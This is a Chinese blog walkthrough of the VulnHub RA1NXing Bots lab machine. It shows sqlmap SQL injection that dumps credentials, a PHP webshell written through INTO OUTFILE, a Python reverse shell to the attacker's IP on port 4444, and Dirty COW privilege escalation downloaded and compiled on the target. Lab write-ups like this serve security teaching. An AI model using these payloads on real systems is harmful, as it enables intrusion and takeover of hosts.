当前位置: 首页 > article >正文

vulhub系列-73-RA1NXing Bots(超详细)

免责声明本文记录的是 RA1NXing Bots 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/botchallenges/RA1NXing_Bots.zip一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址dirsearch -u http://192.168.5.11 Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:38:85:20 PCS Systemtechnik GmbH 192.168.5.14 08:00:27:4b:51:94 PCS Systemtechnik GmbH ​ 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 3 respondednmap -sP 192.168.5.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 05:50 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00013s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00013s latency). MAC Address: 08:00:27:38:85:20 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.14 Host is up (0.00019s latency). MAC Address: 08:00:27:4B:51:94 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.5 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.02 seconds目标IP192.168.5.142、探测目标IP开放端口nmap -A -T4 -p 1-65535 192.168.5.14┌──(root㉿kali)-[~] └─# nmap -A -T4 -p 1-65535 192.168.5.14 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 05:51 -0400 Nmap scan report for 192.168.5.14 Host is up (0.00024s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6squeeze3 (protocol 2.0) | ssh-hostkey: | 1024 a2:24:9c:39:48:84:7f:da:1f:51:b9:0a:1b:45:df:aa (DSA) |_ 2048 35:f5:0e:fa:c3:6b:98:8a:25:e1:f8:bf:de:38:82:03 (RSA) 80/tcp open http Apache httpd 2.2.16 ((Debian)) |_http-server-header: Apache/2.2.16 (Debian) | http-title: Site doesnt have a title (text/html). |_Requested resource was /index.php?pagemain 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 6667/tcp open irc IRCnet ircd MAC Address: 08:00:27:4B:51:94 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6.32 OS details: Linux 2.6.32 Network Distance: 1 hop Service Info: Host: irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel ​ TRACEROUTE HOP RTT ADDRESS 1 0.24 ms 192.168.5.14 ​ OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.64 seconds端口22、80、111、66673、目录探测dirsearch -u http://192.168.5.14┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.14 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.14/_26-03-24_05-52-16.txt Target: http://192.168.5.14/ [05:52:16] Starting: [05:52:17] 403 - 243B - /.ht_wsr.txt [05:52:17] 403 - 240B - /.htaccess.bak1 [05:52:17] 403 - 240B - /.htaccess.sample [05:52:17] 403 - 240B - /.htaccess.save [05:52:17] 403 - 240B - /.htaccess.orig [05:52:17] 403 - 241B - /.htaccess_extra [05:52:17] 403 - 241B - /.htaccess_orig [05:52:17] 403 - 239B - /.htaccess_sc [05:52:17] 403 - 238B - /.htaccessOLD [05:52:17] 403 - 239B - /.htaccessOLD2 [05:52:17] 403 - 239B - /.htaccessBAK [05:52:17] 403 - 234B - /.htm [05:52:17] 403 - 234B - /.html [05:52:17] 403 - 244B - /.htpasswd_test [05:52:17] 403 - 241B - /.httr-oauth [05:52:17] 403 - 240B - /.htpasswds [05:52:28] 403 - 237B - /cgi-bin/ [05:52:29] 200 - 126B - /contact [05:52:29] 200 - 126B - /contact.php [05:52:37] 200 - 147B - /login [05:52:38] 200 - 115B - /main [05:52:46] 403 - 241B - /server-status/ [05:52:46] 403 - 240B - /server-status Task Completed二、漏洞利用1、信息搜集http://192.168.5.14/index.phphttp://192.168.5.14/index.php?pageloginYakit对这个页面抓包将请求的内容保存为sql.txt文件。2、SQLMap数据库cat sql.txt # 获取数据库 sqlmap -r sql.txt --batch --dbs --level3 --risk2┌──(root?kali)-[~] └─# cat sql.txt POST /index.php?pagelogin HTTP/1.1 Host: 192.168.5.14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Referer: http://192.168.5.14/index.php?pagelogin Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 Accept-Encoding: gzip, deflate Origin: http://192.168.5.14 Content-Length: 17 user1password1 ┌──(root?kali)-[~] └─# sqlmap -r sql.txt --batch --dbs --level3 --risk2 ___ __H__ ___ ___[.]_____ ___ ___ {1.9.12#stable} |_ -| . [] | .| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 06:00:48 /2026-03-24/ [06:00:48] [INFO] parsing HTTP request from sql.txt [06:00:49] [INFO] resuming back-end DBMS mysql [06:00:49] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user1 AND 1612(SELECT (CASE WHEN (16121612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -password1 Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user1 AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(64886488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQMpassword1 Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: user1 AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJlpassword1 --- [06:00:49] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: Apache 2.2.16, PHP 5.3.3 back-end DBMS: MySQL 5.0 [06:00:49] [INFO] fetching database names [06:00:49] [INFO] resumed: information_schema [06:00:49] [INFO] resumed: mysql [06:00:49] [INFO] resumed: user_db available databases [3]: [*] information_schema [*] mysql [*] user_db [06:00:49] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 06:00:49 /2026-03-24/注入的出user_db数据库数据表sqlmap -r sql.txt --batch -D user_db --tables┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch -D user_db --tables ___ __H__ ___ ___[(]_____ ___ ___ {1.9.12#stable} |_ -| . [] | .| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 06:02:17 /2026-03-24/ [06:02:17] [INFO] parsing HTTP request from sql.txt [06:02:17] [INFO] resuming back-end DBMS mysql [06:02:17] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user1 AND 1612(SELECT (CASE WHEN (16121612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -password1 Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user1 AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(64886488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQMpassword1 Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: user1 AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJlpassword1 --- [06:02:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL 5.0 [06:02:17] [INFO] fetching tables for database: user_db [06:02:17] [INFO] retrieved: users Database: user_db [1 table] ------- | users | ------- [06:02:17] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 06:02:17 /2026-03-24/得到users表字段sqlmap -r sql.txt --batch -D user_db -T users --columns┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch -D user_db -T users --columns ___ __H__ ___ ___[)]_____ ___ ___ {1.9.12#stable} |_ -| . [.] | .| . | |___|_ []_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 06:04:18 /2026-03-24/ [06:04:18] [INFO] parsing HTTP request from sql.txt [06:04:18] [INFO] resuming back-end DBMS mysql [06:04:18] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user1 AND 1612(SELECT (CASE WHEN (16121612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -password1 Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user1 AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(64886488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQMpassword1 Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: user1 AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJlpassword1 --- [06:04:18] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: Apache 2.2.16, PHP 5.3.3 back-end DBMS: MySQL 5.0 [06:04:18] [INFO] fetching columns for table users in database user_db [06:04:18] [INFO] retrieved: user [06:04:18] [INFO] retrieved: varchar(256) [06:04:18] [INFO] retrieved: pass [06:04:18] [INFO] retrieved: varchar(256) Database: user_db Table: users [2 columns] ---------------------- | Column | Type | ---------------------- | user | varchar(256) | | pass | varchar(256) | ---------------------- [06:04:18] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 06:04:18 /2026-03-24/获取字段值sqlmap -r sql.txt --batch -D user_db -T users --dump┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch -D user_db -T users --dump ___ __H__ ___ ___[,]_____ ___ ___ {1.9.12#stable} |_ -| . [] | .| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 06:04:58 /2026-03-24/ [06:04:58] [INFO] parsing HTTP request from sql.txt [06:04:58] [INFO] resuming back-end DBMS mysql [06:04:58] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user1 AND 1612(SELECT (CASE WHEN (16121612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -password1 Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user1 AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(64886488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQMpassword1 Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: user1 AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJlpassword1 --- [06:04:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: Apache 2.2.16, PHP 5.3.3 back-end DBMS: MySQL 5.0 [06:04:58] [INFO] fetching columns for table users in database user_db [06:04:58] [INFO] resumed: user [06:04:58] [INFO] resumed: varchar(256) [06:04:58] [INFO] resumed: pass [06:04:58] [INFO] resumed: varchar(256) [06:04:58] [INFO] fetching entries for table users in database user_db [06:04:58] [INFO] retrieved: root [06:04:58] [INFO] retrieved: totally not helpful password Database: user_db Table: users [1 entry] -------------------------------------- | pass | user | -------------------------------------- | totally not helpful password | root | -------------------------------------- [06:04:58] [INFO] table user_db.users dumped to CSV file /root/.local/share/sqlmap/output/192.168.5.14/dump/user_db/users.csv [06:04:58] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 06:04:58 /2026-03-24/综合结果如下root/totally not helpful password3、SQL命令注入sqlmap -r sql.txt --batch --file-read/var/www/index.php┌──(root㉿kali)-[~] └─# sqlmap -r sql.txt --batch --file-read/var/www/index.php ___ __H__ ___ ___[.]_____ ___ ___ {1.9.12#stable} |_ -| . [.] | .| . | |___|_ []_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 06:06:00 /2026-03-24/ [06:06:00] [INFO] parsing HTTP request from sql.txt [06:06:00] [INFO] resuming back-end DBMS mysql [06:06:00] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: user1 AND 1612(SELECT (CASE WHEN (16121612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -password1 Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user1 AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(64886488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQMpassword1 Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: user1 AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJlpassword1 --- [06:06:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 6 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL 5.0 [06:06:00] [INFO] fingerprinting the back-end DBMS operating system [06:06:00] [INFO] the back-end DBMS operating system is Linux [06:06:00] [INFO] fetching file: /var/www/index.php ?php if(!isset($_GET[page])) { header(Location: /index.php?pagemain); exit(); } ? html head /head body a href/index.php?pagemainMain/abr/ a href/index.php?pageloginLogin/abr/ a href/index.php?pagecontact.phpContact Us/abr/ ?php $page basename($_GET[page]); print(file_get_contents($page)); ? ?php if(isset($_POST[user]) isset($_POST[password])) { $user $_POST[user]; $pass $_POST[password]; $link mysql_connect(localhost, root, some bad pass); mysql_select_db(user_db); $query SELECT * FROM users WHERE user.$user. AND pass$pass; $result mysql_query($query) or die(mysql_error()); if(mysql_num_rows($result) 1) { print(YOU LOGGED IN!br/); } mysql_close($link); } ? /b do you want confirmation that the remote file /var/www/index.php has been successfully downloaded from the back-end DBMS file system? [Y/n] Y [06:06:00] [INFO] retrieved: 796 [06:06:00] [INFO] the local file /root/.local/share/sqlmap/output/192.168.5.14/files/_var_www_index.php and the remote file /var/www/index.php have the same size (796 B) files saved to [1]: [*] /root/.local/share/sqlmap/output/192.168.5.14/files/_var_www_index.php (same file) [06:06:00] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 06:06:00 /2026-03-24/主页Yakit抓包添加后门user1 union select ?php system($_GET[cmd]); ?, into outfile /var/www/bd.php#password1验证后门http://192.168.5.14/bd.php/?cmdwhoami4、反弹shell浏览器http://192.168.5.14/bd.php/?cmdpython%20-c%20%22import%20os,socket,subprocess;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%27192.168.5.5%27,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);psubprocess.call([%27/bin/sh%27,%27-i%27]);%22kalinc -lvnp 4444反弹成功┌──(root?kali)-[~] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.5.5] from (UNKNOWN) [192.168.5.14] 39244 /bin/sh: cant access tty; job control turned off $三、权限提升1、切换bash下shellpython -c import pty; pty.spawn(/bin/bash)$ python -c import pty; pty.spawn(/bin/bash) www-dataIRCC2:/var/www$ www-dataIRCC2:/var/www$2、查看当前账户是否存在可以使用的特权命令www-dataIRCC2:/home/legit$ sudo -l sudo -l bash: sudo: command not found www-dataIRCC2:/home/legit$3、检查内核版本uname -awww-dataIRCC2:/home/legit$ uname -a uname -a Linux IRCC2 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux www-dataIRCC2:/home/legit$4、内核漏洞提权 (Kernel Exploit)kaliwget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c python -m http.server 80┌──(root㉿kali)-[~] └─# wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c --2026-03-24 06:18:39-- https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c 正在解析主机 raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ... 正在连接 raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... 已连接。 已发出 HTTP 请求正在等待回应... 200 OK 长度4795 (4.7K) [text/plain] 正在保存至: “dirty.c” dirty.c 100%[] 4.68K --.-KB/s 用时 0s 2026-03-24 06:18:54 (74.4 MB/s) - 已保存 “dirty.c” [4795/4795]) ┌──(root㉿kali)-[~] └─# ls 3.jpg dirty.c lxd-alpine-builder reports sql.txt steganopayload148505.txt wordlist.txt ┌──(root㉿kali)-[~] └─# python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...目标靶机cd /tmp wget http://192.168.5.5/dirty.c gcc -pthread dirty.c -o dirty -lcrypt chmod x dirty ./dirtywww-dataIRCC2:/home/legit$ cd /tmp cd /tmp www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ wget http://192.168.5.5/dirty.c wget http://192.168.5.5/dirty.c --2026-03-24 06:21:02-- http://192.168.5.5/dirty.c Connecting to 192.168.5.5:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4795 (4.7K) [text/x-csrc] Saving to: dirty.c 100%[] 4,795 --.-K/s in 0s 2026-03-24 06:21:02 (469 MB/s) - dirty.c saved [4795/4795] www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ gcc dirty.c -o dirty -pthread gcc dirty.c -o dirty -pthread /tmp/ccZiwsv1.o: In function generate_password_hash: dirty.c:(.text0x16): undefined reference to crypt collect2: ld returned 1 exit status www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ ls ls dirty.c www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt gcc -pthread dirty.c -o dirty -lcrypt www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ ls ls dirty dirty.c www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ chmod x dirty chmod x dirty www-dataIRCC2:/tmp$ www-dataIRCC2:/tmp$ ./dirty ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: 123456 Complete line: toor:toKbqrb/U79xA:0:0:pwned:/root:/bin/bash mmap: b76e4000执行完成后得到用户和密码toor/123456将反弹shell断开后重新连接使用新用户toor和密码登录获取root权限。su toor 密码123456 idwww-dataIRCC2:/var/www$ su toor su toor Password: 123456 ​ toorIRCC2:/var/www# ​ toorIRCC2:/var/www# id id uid0(toor) gid0(root) groups0(root) toorIRCC2:/var/www# ​ toorIRCC2:/var/www# cd /root cd /root toorIRCC2:~# ​ toorIRCC2:~# ls ls decoded.php toorIRCC2:~# ​ toorIRCC2:~# whoami whoami toor toorIRCC2:~# ​ toorIRCC2:~# ​本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。

相关文章:

vulhub系列-73-RA1NXing Bots(超详细)

免责声明:本文记录的是 RA1NXing Bots 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全…...

知识图谱(BILSTM+CRF项目完整实现)【第六章】

一、代码架构图在data_origin中有两种类型的数据:分别是一般项目和一般项目txtoriginal一般项目中放的是部位、症状、索引;列之间用制表符隔开一般项目txtoriginal放的是原始数据;二、构建序列标注数据要把原始数据转换为目标数据:常用的方式…...

LLM应用缓存设计范式重构,Dify 2026新增Context-Aware TTL引擎与动态驱逐策略

第一章:Dify 2026缓存机制演进与核心设计哲学Dify 2026 的缓存体系并非简单沿袭传统 LRU 或 TTL 模式,而是以“语义感知”与“推理链可追溯”为双支柱重构底层数据生命周期管理。其核心设计哲学强调:缓存不是性能的临时补丁,而是推…...

NativeScript APP 开发备忘

devtools 调试断开 命令ns debug android可以开启浏览器的调试页面,非常方便。一开始使用功能非常完整,包括元素、日志、代码和网络,后来用着用着,发现元素和网络没了,剩下日志和代码可用,再后来用着用着&…...

unity mcp接入 实现一句话生成游戏!

文章目录前言一、MCP 核心包接入 Unity 编辑器1、使用Git URL 安装(可选,最新)2、Unity Asset Store 安装(可选,稳定)2、OpenUPM(可选)二、Python 3.10 与 uv 环境搭建1、安装 Pyth…...

担心2026年数字人直播系统投入过高?五款主流平台落地方案对比评测

一、引文/摘要:投入焦虑下,如何选对数字人直播系统2026年数字人直播持续升温,越来越多商家想借助数字人直播系统降本增效,但“投入高、落地难、性价比低”成为首要顾虑。不少用户困惑,如何在控制成本的同时&#xff0c…...

多态章-虚函数-重写-协变-override/final-重写覆盖隐藏的对比-纯虚函数与抽象类-多态的底层-虚函数表-动态绑定-静态绑定

使用的父类子类 基于继承下的虚函数 调用 ——代码复用。形成条件:1.必须是基类的指针或引用调用虚函数。 2.调用子类中拥有父类的虚函数的重写/覆盖。虚函数:类成员函数前加以virtual就成为了虚函数 注意:非成员函数无法加virtual修饰。cl…...

Phi-3-mini-4k-instruct-gguf多场景应用:写邮件/解题/写SQL/生成测试用例实战演示

Phi-3-mini-4k-instruct-gguf多场景应用:写邮件/解题/写SQL/生成测试用例实战演示 1. 模型简介 Phi-3-Mini-4K-Instruct是一个38亿参数的轻量级开源模型,采用GGUF格式提供。这个模型在Phi-3数据集上训练,该数据集包含合成数据和经过筛选的公…...

Java八股文实战:从原理到代码,解析Pixel Couplet Gen的Java客户端设计

Java八股文实战:从原理到代码,解析Pixel Couplet Gen的Java客户端设计 1. 为什么需要关注Java客户端设计 在分布式系统开发中,客户端设计往往是被忽视的一环。很多开发者更关注服务端实现,却忽略了客户端的健壮性和可维护性。但…...

金融评分卡‌是一种将用户信用风险量化为分数的模型工具,广泛应用于贷款审批、额度定价和风险预警等环节,分数越高代表风险越低

‌金融评分卡‌是一种将用户信用风险量化为分数的模型工具,广泛应用于贷款审批、额度定价和风险预警等环节,分数越高代表风险越低。一、评分卡的核心作用金融机构通过评分卡快速判断:是否授信(如信用卡申请)授信额度与…...

0421晨间日记

- 关键词 - 上午- 吃饭- 从五台山到大同 - 下午- 云冈石窟- 石头要好雕刻,就意味着容易损毁- 国家要统治- 人生来就是苦的,让你接受是苦的- 地主因为信佛,得到了好处的,愿意捐钱修建- 大同古城墙- 这个建立起来确实很壮观- 但是高…...

数据预处理和超范围值处理步骤 18

1 .数据预处理实验(1)导入数据操作步骤:① 从“源”面板拖入“Excel”节点。② 双击节点,选择待处理的数据文件。③ 从“输出”面板拖入“表格”节点,连接至“Excel”节点,右键运行,查看原始数据…...

辅助医生能力成长与患者个体化治疗方案生成系统(上)

摘要 本文档详细阐述了一套面向基层医疗机构的辅助医生能力成长与患者个体化治疗方案生成系统的设计与实现。系统以“规则驱动为基、数据驱动为翼”为核心思想,通过症状-疾病映射、指南依据匹配、用药禁忌筛查、个体化调整与风险预警等模块,为临床医生提供实时、可解释的决策…...

【2026最新】JDK 下载安装与环境配置全教程(Windows/Mac/Linux 三平台,零基础友好)

Java 开发的第一步,就是把 JDK 环境搭好。这一步看着简单,但不少新手会在环境变量配置上踩坑——JAVA_HOME 没设对、javac 报“不是内部或外部命令”、改完变量终端里还是不生效……这些坑我都替你踩过一遍了。 这篇文章就用最直白的方式,手…...

在 Word 中,一个公式就能看出你会不会高效排版

在 Word 中,一个公式就能看出你会不会高效排版 很多人写论文、实验报告或者技术文档时,一碰到公式就习惯打开 MathType,点来点去插入分式、求和、下标,操作不算难,但确实有点慢。 其实,对于很多常见公式&am…...

从零开始:Spring Boot + MyBatis 搭建后端接口完整教程

前言:你是否刚接触 Spring Boot,面对一堆配置不知从何下手?是否看了很多教程,却还是搞不清 Controller、Service、Mapper 到底谁先谁后?本文带你从零开始,手把手搭建一个完整的 Spring Boot MyBatis 项目。…...

当智能眼镜遇上了AI——使用灵珠搭建【镜中食谱】智能体

今天带大家沉浸式体验 Rokid 自研的 AI 开发平台——【灵珠平台】! 🌟 零代码、零门槛,手把手教你搭建一个专属的【镜中食谱】智能体,让 Rokid Glasses 解决你的吃饭难题! 本文智能体基于Rokid AI Glasses和灵珠AI平…...

Pi0视觉-语言-动作流模型科研应用:人类意图识别与机器人行为对齐研究

Pi0视觉-语言-动作流模型科研应用:人类意图识别与机器人行为对齐研究 1. 项目概述与科研价值 Pi0是一个突破性的视觉-语言-动作流模型,专门为通用机器人控制而设计。这个模型的核心价值在于它能够将人类的自然语言指令、视觉感知和机器人动作生成无缝连…...

robot_localization实现imu和odom融合

记录使用robot_localization进行融合下载地址:git clone https://gitee.com/bingshuibuliang/robot_localization.git注意:/odometry/filtered是这个节点发送的融合位姿,修改的话需要在ekf_nodelet_template.launch里,在使用robot…...

从扩频时钟到弹性缓存:一张图看懂PCIe是如何‘容忍’时钟偏差,保证数据不丢的

从水流模型到数据同步:图解PCIe时钟偏差补偿机制 想象一下城市供水系统中两个不同步的水泵——一个抽水快,一个抽水慢。如果没有调节装置,要么水管爆裂,要么用户断水。PCIe总线面临的时钟同步挑战与此惊人相似。本文将用生活化的水…...

《Spring Boot 第一个 REST API 教程》

前置知识:Java 基础、Maven 基础 最终效果:启动一个 Spring Boot 应用,通过浏览器访问 http://localhost:8080/hello 得到 {"msg":"Hello World"} 步骤 1:创建项目 推荐使用 Spring Initializr:…...

ROS2笔记2:使用Topic自定义Messages实现nodes之间通讯

1. Package规划 1.1 自定义消息接口my_interface_pkg DirCommandRequest.msg请求Topic消息 由发起node发起的Topic消息builtin_interfaces/Time stamp # 记录时间戳 string directory # 操作的目录 int8 command # 操作指令. 0:list, 1:re…...

如何3分钟解决百度网盘提取码难题:baidupankey完全指南

如何3分钟解决百度网盘提取码难题:baidupankey完全指南 【免费下载链接】baidupankey 项目地址: https://gitcode.com/gh_mirrors/ba/baidupankey 你是否曾因找不到百度网盘提取码而错过重要资源?当朋友分享学习资料、同事发送工作文件&#xff…...

2026年最新好用的WMS仓库管理系统盘点!10款国内外热门WMS系统推荐

面对仓储管理的挑战,越来越多的企业开始关注WMS系统。但在选型时,很多企业面临同样的困惑:市场上WMS系统那么多,到底哪款适合自己?本文盘点2026年国内外10款热门WMS系统,从功能特点、适用场景、性价比等维度…...

3分钟搞定百度网盘提取码:baidupankey智能工具终极指南

3分钟搞定百度网盘提取码:baidupankey智能工具终极指南 【免费下载链接】baidupankey 项目地址: https://gitcode.com/gh_mirrors/ba/baidupankey 你是否曾经遇到过这样的情况:好不容易找到了需要的资源,却被百度网盘提取码挡在门外&…...

打卡信奥刷题(3138)用C++实现信奥题 P7617 [COCI 2011/2012 #2] KOMPIĆI

